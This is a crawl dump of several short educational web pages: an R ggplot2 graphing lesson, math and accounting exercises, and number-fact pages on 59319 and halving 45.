so within `aes()`. Instead of providing a color name, we need to provide the name the color will have in the legend. Do so for both lines.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_glasses_wine,\ncolor = \"Glasses of Wine\"\n)) +\ngeom_line() +\ngeom_line(aes(\nx = year,\ny = number_of_shots_liquor,\ncolor = \"Shots of Liquor\"\n))``````", null, "We can change the legend title by using the function `labs()` and changing the value `color` to what we want the legend title to be.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_glasses_wine,\ncolor = \"Glasses of Wine\"\n)) +\ngeom_line() +\ngeom_line(aes(\nx = year,\ny = number_of_shots_liquor,\ncolor = \"Shots of Liquor\"\n)) +\nlabs(color = \"Alcohol Type\")``````", null, "Finally, a useful way to move the legend from the side to the bottom is to use the `theme()` function to set `legend.position` to “bottom”. This will allow the graph to be wider.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_glasses_wine,\ncolor = \"Glasses of Wine\"\n)) +\ngeom_line() +\ngeom_line(aes(\nx = year,\ny = number_of_shots_liquor,\ncolor = \"Shots of Liquor\"\n)) +\nlabs(color = \"Alcohol Type\") +\ntheme(legend.position = \"bottom\")``````", null, "## 14.4 Scatter plots\n\nMaking a scatter plot simply requires changing the x-axis from year to another numerical variable and using `geom_point()`. Since our data has one row for every year for Pennsylvania, we can make a scatterplot comparing different drinks in each year. 
For this example, we’ll compare liquor to beer sales.\n\n``````ggplot(penn_alcohol, aes(\nx = number_of_shots_liquor,\ny = number_of_beers\n)) +\ngeom_point()``````", null, "This graph shows us that when liquor consumption increases, beer consumption also tends to increase.\n\nWhile scatterplots can help show the relationship between variables, we lose the information of how consumption changes over time.\n\n## 14.5 Color blindness\n\nPlease keep in mind that some people are color blind so graphs (or maps, which we will learn about soon) will be hard to read for these people if we choose bad colors. A helpful site for choosing colors for graphs and maps is Color Brewer.", null, "This site lets you select which type of colors you want (sequential and diverging, such as shades in a hotspot map, and qualitative, such as for data like what we used in this lesson). In the “Only show:” section you can set it to “colorblind safe” to restrict it to colors that allow people with color blindness to read your graph. To the right of this section it shows the HEX codes for each color. A HEX code is just a code that a computer can read and know exactly which color it is.\n\nLet’s use an example of a color-blind friendly color from the “qualitative” section of ColorBrewer. We have three options on this page (we can change how many colors we want but it defaults to showing 3): green (HEX = #1b9e77), orange (HEX = #d95f02), and purple (HEX = #7570b3). We’ll use the orange and purple colors. To manually set colors in `ggplot()` we use `scale_color_manual(values = c())` and include a vector of color names or HEX codes inside the `c()`. Doing that using the orange and purple HEX codes will change our graph colors to these two colors.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_glasses_wine,\ncolor = \"Glasses of Wine\"\n)) +\ngeom_line() +\ngeom_line(aes(\nx = year,\ny = number_of_shots_liquor,\ncolor = \"Shots of Liquor\"\n)) +\nlabs(color = \"Alcohol Type\") +\ntheme(legend.position = \"bottom\") +\nscale_color_manual(values = c(\"#7570b3\", \"#d95f02\"))``````", null, "" ]
[ null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-316-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-318-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-319-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-320-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-321-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-322-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-323-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-324-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-325-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-326-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-327-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-328-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-329-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-330-1.png", null, "https://crimebythenumbers.com/images/colorbrewer.PNG", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-332-1.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85248405,"math_prob":0.9854493,"size":11863,"snap":"2022-27-2022-33","text_gpt3_token_len":3155,"char_repetition_ratio":0.14276077,"word_repetition_ratio":0.10774578,"special_character_ratio":0.28028324,"punctuation_ratio":0.11247803,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9883555,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,5,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-19T04:07:18Z\",\"WARC-Record-ID\":\"<urn:uuid:e903d5af-5410-493d-8803-a30834521a97>\",\"Content-Length\":\"83816\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:db9ec321-ed3c-4057-9f2b-e2df95bd013a>\",\"WARC-Concurrent-To\":\"<urn:uuid:97c63d71-e74d-4c5f-8eb5-2fe8ad59fc2e>\",\"WARC-IP-Address\":\"185.199.109.153\",\"WARC-Target-URI\":\"https://crimebythenumbers.com/graphing-intro.html\",\"WARC-Payload-Digest\":\"sha1:6C4QEDXY2FSNMZE7LK62NELUPW7VCDJ5\",\"WARC-Block-Digest\":\"sha1:GAFX4OYCPG65KSLQMK32FAKOLSCW7NEH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882573623.4_warc_CC-MAIN-20220819035957-20220819065957-00252.warc.gz\"}"}
https://mr-mathematics.com/product/using-real-life-graphs/
[ "# Using Real Life Graphs\n\nStudents learn how to model situations or procedures using real life graphs.  Learning progresses from drawing the real life graph when given the y-intercept value to finding the equation of the line to model the situation as an equation.\n##### Differentiated Learning Objectives\n• All students should be able to complete a table of results when given a rule.\n• Most students should be able to use a straight-line graph model a mathematical procedure.\n• Some students should be able to model situations or procedures by translating them into formulae and by using graphs.\nSKU: 763\n\n### Mr Mathematics Blog\n\n#### Problem Solving Maths Lessons\n\nFour new problem solving lessons to develop student’s mathematical reasoning and communication skills.\n\n#### Teaching in a Bubble\n\nPractical tips and advice for preparing to teach in year group bubbles.\n\n#### Problem Solving – Perimeter and Area\n\nStudents are challenged to apply the rules of arithmetic to a series of real-life, functional problems." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9009964,"math_prob":0.82144964,"size":326,"snap":"2020-34-2020-40","text_gpt3_token_len":62,"char_repetition_ratio":0.1521739,"word_repetition_ratio":0.06,"special_character_ratio":0.18404908,"punctuation_ratio":0.054545455,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98728687,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-13T23:07:07Z\",\"WARC-Record-ID\":\"<urn:uuid:b853105f-ec85-4d59-bc9b-772da6cac834>\",\"Content-Length\":\"72102\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d026038f-9e1e-4e46-b616-190a24f2811a>\",\"WARC-Concurrent-To\":\"<urn:uuid:80882b63-1033-453c-b7d1-52e188a314db>\",\"WARC-IP-Address\":\"68.66.200.219\",\"WARC-Target-URI\":\"https://mr-mathematics.com/product/using-real-life-graphs/\",\"WARC-Payload-Digest\":\"sha1:7SNO5GWKLBIWAQ2ZMGAQZCURRPHQXGNQ\",\"WARC-Block-Digest\":\"sha1:4HZZKWB46T26LY65K5PVQ2ZM2SFZWNWR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439739104.67_warc_CC-MAIN-20200813220643-20200814010643-00201.warc.gz\"}"}
https://studylib.net/doc/25417199/assignment-1
[ "# Assignment 1", null, "```College of Business Administration, University of Sharjah\nMgt. Acc. and Control Systems - 0306613\nFall Semester (2019/2020)\nAssignment 1\nMustafa Al Rashedi\nU19102890\n1)\nUnits produced and sold\nParticulars\n80,000\n100,000\n120,000\nVariable Cost\nFixed Costs\n240,000.00\n320,000.00\n560,000.00\n300,000.00\n320,000.00\n620,000.00\n360,000.00\n320,000.00\n680,000.00\nVariable Cost\nFixed Costs\n3\n4\n7\n3\n3.2\n6.2\n3\n2.67\n5.67\nTotal Costs\nTotal Costs\nCost per unit\nTotal Cost per unit\n\n\n\n\nVariable cost per unit is = 240,000/80,000 = AED 3.00 per unit\nVariable cost at AED 3.00 per unit remains same irrespective of units produced.\nSo, the Variable Cost per unit remains same in all 3 cases.\nSince units produced differ – FC per unit changes to AED 3.2 and AED 2.67 when\nproduction increases to 100,000 and 120,000 respectively\n2)\nContribution Income format\nParticulars\nAmount (in \\$)\nSales\n715,000.00\n(-) Variable Expenses\n330,000.00\nContribution Margin\n385,000.00\n(-) Fixed Expenses\n320,000.00\nNet Operating Income\n65,000.00\n\nSales = Units produced x Selling price\n110,000 units x \\$6.50 = \\$715,000\n\nVariable expenses = Units produced x Variable cost per unit\n110,000 units x \\$3 = \\$330,000\n\nContribution Margin = Sales – Variable Expenses\n\\$715,000-\\$330,000 = \\$385,000\n\nFixed expenses remain same at \\$320,000\n\nNet Operating Income = Contribution Margin – Fixed Expenses\n\\$385,000-\\$320,000 = \\$65,000.\n```" ]
[ null, "https://s3.studylib.net/store/data/025417199_1-e4b8fe48451b89b8ddc860080dfed72c-768x994.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.69918144,"math_prob":0.9912426,"size":1368,"snap":"2021-43-2021-49","text_gpt3_token_len":413,"char_repetition_ratio":0.19354838,"word_repetition_ratio":0.0,"special_character_ratio":0.42909357,"punctuation_ratio":0.1968254,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9799806,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-16T03:56:34Z\",\"WARC-Record-ID\":\"<urn:uuid:38217c94-6a9b-4107-8f80-028f236b9489>\",\"Content-Length\":\"40769\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9ca5f2fe-3f27-4f0c-93c4-add3e63735aa>\",\"WARC-Concurrent-To\":\"<urn:uuid:178cbfdf-2484-4877-b457-8887d3663615>\",\"WARC-IP-Address\":\"172.67.175.240\",\"WARC-Target-URI\":\"https://studylib.net/doc/25417199/assignment-1\",\"WARC-Payload-Digest\":\"sha1:RYDGLJYWXYCVSCPHFF2F3MP2523DMIBB\",\"WARC-Block-Digest\":\"sha1:HIZP53JFV2ERJJYY5NYSS6CL3C3NJI32\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323583408.93_warc_CC-MAIN-20211016013436-20211016043436-00555.warc.gz\"}"}
https://socratic.org/questions/how-do-you-show-whether-the-improper-integral-int-x-2-e-x-3-dx-converges-or-dive
[ "# How do you show whether the improper integral int (x^2)(e^(-x^3)) dx converges or diverges from negative infinity to infinity?\n\nOct 8, 2015\n\nSee the explanation section, below.\n\n#### Explanation:\n\nWe need (among other things):\n\n${\\lim}_{u \\rightarrow - \\infty} {e}^{u} = 0$ and ${\\lim}_{u \\rightarrow \\infty} {e}^{u} = \\infty$.\n\nLet's note that $\\int {x}^{2} {e}^{- {x}^{3}} \\mathrm{dx} = - \\frac{1}{3} {e}^{- {x}^{3}} + C$.\n(By substitution with $u = {x}^{3}$.)\n\nWe also note that to (attempt to) evaluate an integral that is improper at both limits of integration, we need to breack the interval into two pieces using ${\\int}_{a}^{b} f \\left(x\\right) \\mathrm{dx} = {\\int}_{a}^{c} f \\left(x\\right) \\mathrm{dx} + {\\int}_{c}^{b} f \\left(x\\right) \\mathrm{dx}$.\n\nLet's use $c = 0$, (Because that makes the exponential easy to evaluate.)\n\n${\\int}_{-} {\\infty}^{\\infty} \\left({x}^{2}\\right) \\left({e}^{- {x}^{3}}\\right) \\mathrm{dx} = {\\int}_{-} {\\infty}^{0} \\left({x}^{2}\\right) \\left({e}^{- {x}^{3}}\\right) \\mathrm{dx} + {\\int}_{0}^{\\infty} \\left({x}^{2}\\right) \\left({e}^{- {x}^{3}}\\right) \\mathrm{dx}$ $\\text{ }$ (If both integrals exist.)\n\n${\\int}_{-} {\\infty}^{0} \\left({x}^{2}\\right) \\left({e}^{- {x}^{3}}\\right) \\mathrm{dx} = {\\lim}_{a \\rightarrow - \\infty} {\\int}_{a}^{0} \\left({x}^{2}\\right) \\left({e}^{- {x}^{3}}\\right) \\mathrm{dx}$\n\n = lim_(ararr-oo) ((-1/3e^(-x^3))]_a^0)\n\n$= {\\lim}_{a \\rightarrow - \\infty} \\left(- \\frac{1}{3} + \\frac{1}{3} {e}^{- {a}^{3}}\\right)$\n\nAs $a \\rightarrow - \\infty$, the exponent $- {a}^{3} \\rightarrow \\infty$ so the integral diverges.\n\nWe conclude that the original integral, ${\\int}_{-} {\\infty}^{\\infty} \\left({x}^{2}\\right) \\left({e}^{- {x}^{3}}\\right) \\mathrm{dx}$ diverges.\n\nNote\nBy the way, the other integral, ${\\int}_{0}^{\\infty} \\left({x}^{2}\\right) \\left({e}^{- {x}^{3}}\\right) \\mathrm{dx} = \\frac{1}{3}$\n\nAlso, we might have noted before integrating, that\nas $x \\rightarrow - \\infty$,\nthe integrand ${x}^{2} {e}^{- {x}^{3}} \\rightarrow \\infty$.\nSo. there was no chance of the integral left of zero being finite.\n\nHere is the graph of the function:\n\ngraph{x^2 e^(-x^3) [-12.87, 32.78, -4.08, 18.77]}" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.80025524,"math_prob":1.0000064,"size":852,"snap":"2022-27-2022-33","text_gpt3_token_len":250,"char_repetition_ratio":0.1273585,"word_repetition_ratio":0.0,"special_character_ratio":0.29929578,"punctuation_ratio":0.118644066,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99998677,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-18T01:16:55Z\",\"WARC-Record-ID\":\"<urn:uuid:a368fdc6-7da2-4930-8f28-09f3e9327487>\",\"Content-Length\":\"37277\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3d6d763b-6764-4fdf-b42f-9f64d49167db>\",\"WARC-Concurrent-To\":\"<urn:uuid:eb3c4e31-d25e-41d7-a98d-129e12bba53e>\",\"WARC-IP-Address\":\"216.239.34.21\",\"WARC-Target-URI\":\"https://socratic.org/questions/how-do-you-show-whether-the-improper-integral-int-x-2-e-x-3-dx-converges-or-dive\",\"WARC-Payload-Digest\":\"sha1:REAQVKO5ES3RS6H5GPY67557SAVQSKJC\",\"WARC-Block-Digest\":\"sha1:DIMQPWEKQO4YOCG6VDS6AWIZ55XYBXIM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882573145.32_warc_CC-MAIN-20220818003501-20220818033501-00637.warc.gz\"}"}
https://answers.everydaycalculation.com/divide-fractions/10-15-divided-by-6-70
[ "Solutions by everydaycalculation.com\n\n## Divide 10/15 with 6/70\n\n10/15 ÷ 6/70 is 70/9.\n\n#### Steps for dividing fractions\n\n1. Find the reciprocal of the divisor\nReciprocal of 6/70: 70/6\n2. Now, multiply it with the dividend\nSo, 10/15 ÷ 6/70 = 10/15 × 70/6\n3. = 10 × 70/15 × 6 = 700/90\n4. After reducing the fraction, the answer is 70/9\n5. In mixed form: 77/9\n\nMathStep (Works offline)", null, "Download our mobile app and learn to work with fractions in your own time:" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.824296,"math_prob":0.9126905,"size":340,"snap":"2021-31-2021-39","text_gpt3_token_len":152,"char_repetition_ratio":0.22321428,"word_repetition_ratio":0.0,"special_character_ratio":0.5176471,"punctuation_ratio":0.061728396,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9669371,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-27T05:44:59Z\",\"WARC-Record-ID\":\"<urn:uuid:4c6ac205-5f24-4172-a0ab-d8c6105f8a0d>\",\"Content-Length\":\"7931\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bb352da1-3948-409a-ad94-94a6b2483b6e>\",\"WARC-Concurrent-To\":\"<urn:uuid:5b51c45c-6e0f-4d9f-a224-30b80de55219>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/divide-fractions/10-15-divided-by-6-70\",\"WARC-Payload-Digest\":\"sha1:GMETAMHX2J35WC42QZXPO2GVYML6PYKO\",\"WARC-Block-Digest\":\"sha1:QQBDVAZZWQVBCX5GBCX5B6XNE4BLPHSW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046152236.64_warc_CC-MAIN-20210727041254-20210727071254-00164.warc.gz\"}"}
https://curate.nd.edu/catalog?f%5Badmin_unit_hierarchy_sim%5D%5B%5D=University+of+Notre+Dame%3ACollege+of+Science%3AMathematics&f%5Bdesc_metadata__affiliation_sim%5D%5B%5D=Faculty&f%5Bdesc_metadata__creator_sim%5D%5B%5D=Rene+De+Vogelaere&f_inclusive%5Bhuman_readable_type_sim%5D%5B%5D=Doctoral+Dissertation&f_inclusive%5Bhuman_readable_type_sim%5D%5B%5D=Master%27s+Thesis&f_inclusive%5Bhuman_readable_type_sim%5D%5B%5D=Image&f_inclusive%5Bhuman_readable_type_sim%5D%5B%5D=Article&path_only=true
[ "# Mathematics\n\nSearch CurateND\n\n### List of files deposited in CurateND that match your search criteria\n\n• Author(s):\nRene De Vogelaere\nAbstract:\n\nHamilton equations are such that the relation, between the coordinates and momenta at time t and at time t 0, is a contact transformation. Methods of integration of Hamilton equations, which do preserve the contact transformation property are given here. These methods are of first and second order. They are given, for the equation x= f(x,t), then for the case of one degree of freedom, then for the general case. Some of the formulae are implicit.\n\nDate Published:\n1956-04\nRecord Visibility:\nPublic" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85269153,"math_prob":0.927158,"size":807,"snap":"2020-10-2020-16","text_gpt3_token_len":188,"char_repetition_ratio":0.0996264,"word_repetition_ratio":0.0,"special_character_ratio":0.2267658,"punctuation_ratio":0.12666667,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95806646,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-03-28T21:10:56Z\",\"WARC-Record-ID\":\"<urn:uuid:31d6acf4-b9fa-4589-a08c-df884eca2e84>\",\"Content-Length\":\"24829\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:83675272-355f-4e51-a6ee-1e76b358fdf9>\",\"WARC-Concurrent-To\":\"<urn:uuid:c5722b3c-817f-4dc0-a5ec-02e6e1848655>\",\"WARC-IP-Address\":\"129.74.223.90\",\"WARC-Target-URI\":\"https://curate.nd.edu/catalog?f%5Badmin_unit_hierarchy_sim%5D%5B%5D=University+of+Notre+Dame%3ACollege+of+Science%3AMathematics&f%5Bdesc_metadata__affiliation_sim%5D%5B%5D=Faculty&f%5Bdesc_metadata__creator_sim%5D%5B%5D=Rene+De+Vogelaere&f_inclusive%5Bhuman_readable_type_sim%5D%5B%5D=Doctoral+Dissertation&f_inclusive%5Bhuman_readable_type_sim%5D%5B%5D=Master%27s+Thesis&f_inclusive%5Bhuman_readable_type_sim%5D%5B%5D=Image&f_inclusive%5Bhuman_readable_type_sim%5D%5B%5D=Article&path_only=true\",\"WARC-Payload-Digest\":\"sha1:M3SXCAIUZWLH3SUFZBQ352LYOHCM7BG7\",\"WARC-Block-Digest\":\"sha1:5ZZTUSRXBHWKZLPTA7GFO5FLHCJENPVR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370493120.15_warc_CC-MAIN-20200328194743-20200328224743-00172.warc.gz\"}"}
https://numbermatics.com/n/59319/
[ "# 59319\n\n## 59,319 is an odd composite number composed of two prime numbers multiplied together.\n\nWhat does the number 59319 look like?\n\nThis visualization shows the relationship between its 2 prime factors (large circles) and 16 divisors.\n\n59319 is an odd composite number. It is composed of two distinct prime numbers multiplied together. It has a total of sixteen divisors.\n\n## Prime factorization of 59319:\n\n### 33 × 133\n\n(3 × 3 × 3 × 13 × 13 × 13)\n\nSee below for interesting mathematical facts about the number 59319 from the Numbermatics database.\n\n### Names of 59319\n\n• Cardinal: 59319 can be written as Fifty-nine thousand, three hundred nineteen.\n\n### Scientific notation\n\n• Scientific notation: 5.9319 × 104\n\n### Factors of 59319\n\n• Number of distinct prime factors ω(n): 2\n• Total number of prime factors Ω(n): 6\n• Sum of prime factors: 16\n\n### Divisors of 59319\n\n• Number of divisors d(n): 16\n• Complete list of divisors:\n• Sum of all divisors σ(n): 95200\n• Sum of proper divisors (its aliquot sum) s(n): 35881\n• 59319 is a deficient number, because the sum of its proper divisors (35881) is less than itself. Its deficiency is 23438\n\n### Bases of 59319\n\n• Binary: 11100111101101112\n• Base-36: 19RR\n\n### Squares and roots of 59319\n\n• 59319 squared (593192) is 3518743761\n• 59319 cubed (593193) is 208728361158759\n• The square root of 59319 is 243.5549219375\n• 59319 is a perfect cube number. Its cube root is 39\n\n### Scales and comparisons\n\nHow big is 59319?\n• 59,319 seconds is equal to 16 hours, 28 minutes, 39 seconds.\n• To count from 1 to 59,319 would take you about sixteen hours.\n\nThis is a very rough estimate, based on a speaking rate of half a second every third order of magnitude. If you speak quickly, you could probably say any randomly-chosen number between one and a thousand in around half a second. Very big numbers obviously take longer to say, so we add half a second for every extra x1000. (We do not count involuntary pauses, bathroom breaks or the necessity of sleep in our calculation!)\n\n• A cube with a volume of 59319 cubic inches would be around 3.3 feet tall.\n\n### Recreational maths with 59319\n\n• 59319 backwards is 91395\n• 59319 is a Harshad number.\n• The number of decimal digits it has is: 5\n• The sum of 59319's digits is 27\n• More coming soon!\n\nMLA style:\n\"Number 59319 - Facts about the integer\". Numbermatics.com. 2023. Web. 28 March 2023.\n\nAPA style:\nNumbermatics. (2023). Number 59319 - Facts about the integer. Retrieved 28 March 2023, from https://numbermatics.com/n/59319/\n\nChicago style:\nNumbermatics. 2023. \"Number 59319 - Facts about the integer\". https://numbermatics.com/n/59319/\n\nThe information we have on file for 59319 includes mathematical data and numerical statistics calculated using standard algorithms and methods. We are adding more all the time. If there are any features you would like to see, please contact us. Information provided for educational use, intellectual curiosity and fun!\n\nKeywords: Divisors of 59319, math, Factors of 59319, curriculum, school, college, exams, university, Prime factorization of 59319, STEM, science, technology, engineering, physics, economics, calculator, fifty-nine thousand, three hundred nineteen.\n\nOh no. Javascript is switched off in your browser.\nSome bits of this website may not work unless you switch it on." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83961344,"math_prob":0.95520896,"size":2705,"snap":"2023-14-2023-23","text_gpt3_token_len":715,"char_repetition_ratio":0.11847464,"word_repetition_ratio":0.025229357,"special_character_ratio":0.31608135,"punctuation_ratio":0.16412213,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9858744,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-28T02:54:22Z\",\"WARC-Record-ID\":\"<urn:uuid:740a093f-e62a-40a9-8d6c-8b33a979f036>\",\"Content-Length\":\"18229\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7c42ff5a-d40e-4b9b-a462-2a781806ffdb>\",\"WARC-Concurrent-To\":\"<urn:uuid:70f8f734-a6f4-45c8-b5eb-41592f10a95a>\",\"WARC-IP-Address\":\"72.44.94.106\",\"WARC-Target-URI\":\"https://numbermatics.com/n/59319/\",\"WARC-Payload-Digest\":\"sha1:LVOP46XXLMDLD5SCKVRPZALUY574R6PS\",\"WARC-Block-Digest\":\"sha1:Z55BMIIYCMQWJDMUU6K6CPNAXUJYDVPZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296948756.99_warc_CC-MAIN-20230328011555-20230328041555-00771.warc.gz\"}"}
https://replichemoncler.com/what-is-half-of-45/
[ "# What Is Half Of 45\n\nWhat is Half of 45?\nHave you ever been asked what is half of 45? This is a fairly common math question, but it is important to understand the answer so you can solve other math problems. Half of 45 is 22.5. Knowing how to divide by two is essential for understanding more complex math problems. In this article, we will discuss what half of 45 is and how you can calculate the answer yourself.\n\n## What Is Half of 45?\n\nContents\n\nThe answer to the question “what is half of 45?” is 22.5. To calculate this, you have to divide 45 by 2. Dividing by two is the same as halving a number. So, if you want to know what half of 45 is, you simply have to divide 45 by 2. This will give you the answer of 22.5.\n\n## How to Calculate Half of 45\n\nCalculating half of 45 is relatively easy. All you have to do is divide 45 by 2. This can be done using a calculator, or you can do it by hand.\n\nIf you are doing it by hand, the first step is to write the number 45 on a piece of paper. Then, divide the two digits of the number in half. So, for 45, you would divide the 4 in half, which would be 2, and the 5 in half, which would be 2.5. Then, combine the two numbers together and you have your answer: 22.5." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9612437,"math_prob":0.9765822,"size":6449,"snap":"2023-14-2023-23","text_gpt3_token_len":1689,"char_repetition_ratio":0.14072925,"word_repetition_ratio":0.07324595,"special_character_ratio":0.26918903,"punctuation_ratio":0.10493827,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999393,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-23T04:39:13Z\",\"WARC-Record-ID\":\"<urn:uuid:af096aac-73b6-487e-8480-5630bf7eb795>\",\"Content-Length\":\"76144\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f0cd307f-5c96-4462-aef2-43b3cd3f3981>\",\"WARC-Concurrent-To\":\"<urn:uuid:b0408a49-3ae9-43c7-91db-3195e59d7ef1>\",\"WARC-IP-Address\":\"161.97.92.136\",\"WARC-Target-URI\":\"https://replichemoncler.com/what-is-half-of-45/\",\"WARC-Payload-Digest\":\"sha1:LHOEPEZCY3XDJBXHF3XUFQJVS5RWGCV7\",\"WARC-Block-Digest\":\"sha1:JXGM7NCCAPZVRWUVH2L4UBVCIQOR5IIM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296944996.49_warc_CC-MAIN-20230323034459-20230323064459-00584.warc.gz\"}"}
https://askanydifference.com/difference-between-standard-form-and-scientific-form/
[ "# Standard Form vs Scientific Form: Difference and Comparison\n\nA framework of symbols of mathematical information and concepts is known as a mathematical notation. Maths, the physical sciences, engineering, as well as finance all use mathematical notations.\n\n/10\n\nScience Quiz\n\n1 / 10\n\nThe first link in all food chains is-\n\n2 / 10\n\nWhich of the following is used in pencils?\n\n3 / 10\n\nWhat is the PH of H2O?\n\n4 / 10\n\nWhere does photosynthesis take place?\n\n5 / 10\n\nName the metal which is easily cut by a simple knife?\n\n6 / 10\n\nWhat is laughing gas?\n\n7 / 10\n\nWhich among the following is not a synthetic fiber?\n\n8 / 10\n\nThe purpose of choke in tube light is?\n\n9 / 10\n\nName the fabric which is used in making bulletproof jackets?\n\n10 / 10\n\nPermanent hardness of water may be removed by the addition of\n\nThe two most widely used forms of notations are Scientific and Standard Notation.\n\n## Key Takeaways\n\n1. Standard form refers to the typical way of writing numbers using digits, while scientific form (scientific notation) expresses numbers as a product of a coefficient and a power of ten.\n2. The standard form is more suitable for everyday use and simpler calculations, whereas the scientific form is ideal for representing very large or small numbers.\n3. Scientific form simplifies complex calculations and makes comparing numbers with vastly different magnitudes easier.\n\n## Standard Form vs Scientific Form\n\nThe difference between Standard form and Scientific form is that the latter (also known as scientific form, standard index format, or standard form within the United Kingdom) is a way of representing numbers, which are too large or too small to be represented in decimal form. On the other hand, the standard technique of representing numerals is in standard notation.\n\nStandard form is a method of conveniently jotting down extremely large or very small figures. 4*103 equals 4000 since 103= 1000. As a result, 4000 could be represented as 4*103.\n\nThis concept can also be used to quickly note down significantly larger quantities in standard form. Smaller units can be expressed in standard form as well.\n\nScientific notation (also known as the standard form as well as exponential notation) is a method of writing numbers that allow for quantities that are too big or small to be represented in regular decimal notation.\n\nThe expression of a quantity in its ‘normal’ format is referred to as standard notation.\n\n## What is Standard Form?\n\nA standard notation shows a method of writing a particular number, computation, or statement in a specific format that meets the specified criteria. 4.5 billion years, for 